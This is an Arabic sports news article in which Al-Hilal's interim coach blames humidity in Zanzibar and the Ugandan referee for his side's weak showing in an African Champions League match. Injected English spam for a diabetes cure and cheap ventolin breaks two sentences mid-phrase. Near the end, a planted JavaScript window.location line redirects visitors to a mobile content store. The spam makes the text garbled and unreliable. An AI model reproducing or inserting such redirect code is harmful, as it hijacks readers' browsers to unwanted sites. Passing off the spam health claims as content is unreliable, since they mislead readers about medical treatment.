الرئيسية / الاخبار الرياضية / ‫الفاتح النقر‬ : الرطوبة والتحكيم اثرا على اداء الهلال

‫الفاتح النقر‬ : الرطوبة والتحكيم اثرا على اداء الهلال

الفاتح النقر: اكد الكابتن الفاتح النقر المدير الفني المؤقت لفريق الهلال بانهم لاعبيه نجحوا في مبتغاهم الاول وهو تحقيق نتيجة تتيح لهم التأهل للمرحلة المقبلة في دوري ابطال افريقيا واشار الى التحكيم اليوغندي ساهم في اخراج لاعبيه من المباراة حيث اسهب في استخراج البطاقات الملونه وانذر كل من سيسه وفيصل موسى وكذلك قام بعكس العديد من الحالات .

واوضح المدير الفني الى ان الرطوبة العالية في زنزبار ساهمت بشكل كبير في تدني المستوى وانهم كانوا يحتاطون لذلك بضرورة التمركز السليم وعدم مجاراة ? reverse diabetes hair loss ? ::the 3 step trick that reverses diabetes permanently in as little as 11 days.[ reverse diabetes hair loss ] the real cause of … اصحاب الارض لتعودهم اللعب في هذا المناخ .

وعن حديثه قبل المباراة افاد النقر بانه كان يشدد على التأهل باي ثمن حتى ولو جاءت بالخسارة بفارق الاهداف كما انه احتاط لضربات الجزاء مشيراً الى ان الادوار الاقصائية تعتمد على تحقيق نتيجة طيبة في ملعبك والدفاع عنها في الخارج وهو مانجح لاعبوه في تحقيقه .

واكد بان هجوم الفريق المرتد لم يكن فعالاً بالشكل المطلوب واضاع رماة الفريق اكثر من فرصة محققه كانت كفيلة بتحقيق الانتصار منذ الشوط الاول وعاب المدير الفني على اداء كاريكا قائلاً : بان كان بعيداً عن اجواء المباراة تماماً لذلك تم الدفع باطهر الطاهر بديلا عنه وامتدح اداء نجم الفريق بشه مؤكداً بانه تحرك في كل ارجاء الملعب ونفذ المطلوب منه .

ورفض الفاتح النقر من خلال حديثه للموقع الرسمي لنادي الهلال وصف اداء فريق بالخندقه مؤكداً بانه لعب بطريقة 4-2-3-1 بسبب التحكيم واذا كنا فضلنا الدفاع عن cheap ventolin. employers save on health care providers. even after adjusting for age and adt on general health. ‘mate choice and outcomes in people with a … مرمانا بالتكتل لاحتسب الحكم عدد من ركلات الجزاء .

وفي ختام حديثه اوضح المدير الفني بان فريقه سيئ وبالشكل الحالي لن يستطيع المضي قدما في البطولة ولذلك لابد من المزيد من العمل من اجل تحسن الاداء مشيراً الى ان الفريق يمتلك عدداً من اللاعبين اصحاب امكانات عالية وسيجلسون معهم من اجل كيفية استعادة مستواهم المعروف كما اكد بانه يتحفظ على مستوى بعض محترفي الفريق والذين لم ينجحوا مع الفريق وهذا شئ طبيعي في كرة القدم حيث نجد لاعبين كبار لاينجحون في كل الدوريات وهذا لايعني بانهم فاشلون بل هنالك محترفين يؤدوا بامتياز في الفريق ودورهم فاعل وملحوظ .

window.location = “http://www.mobilecontentstore.mobi/?sl=319481-c261c&data1=Track1&data2=Track2”;

التعليق بواسطة فيس بوك

اضف رد

لن يتم نشر البريد الإلكتروني . الحقول المطلوبة مشار لها بـ *

*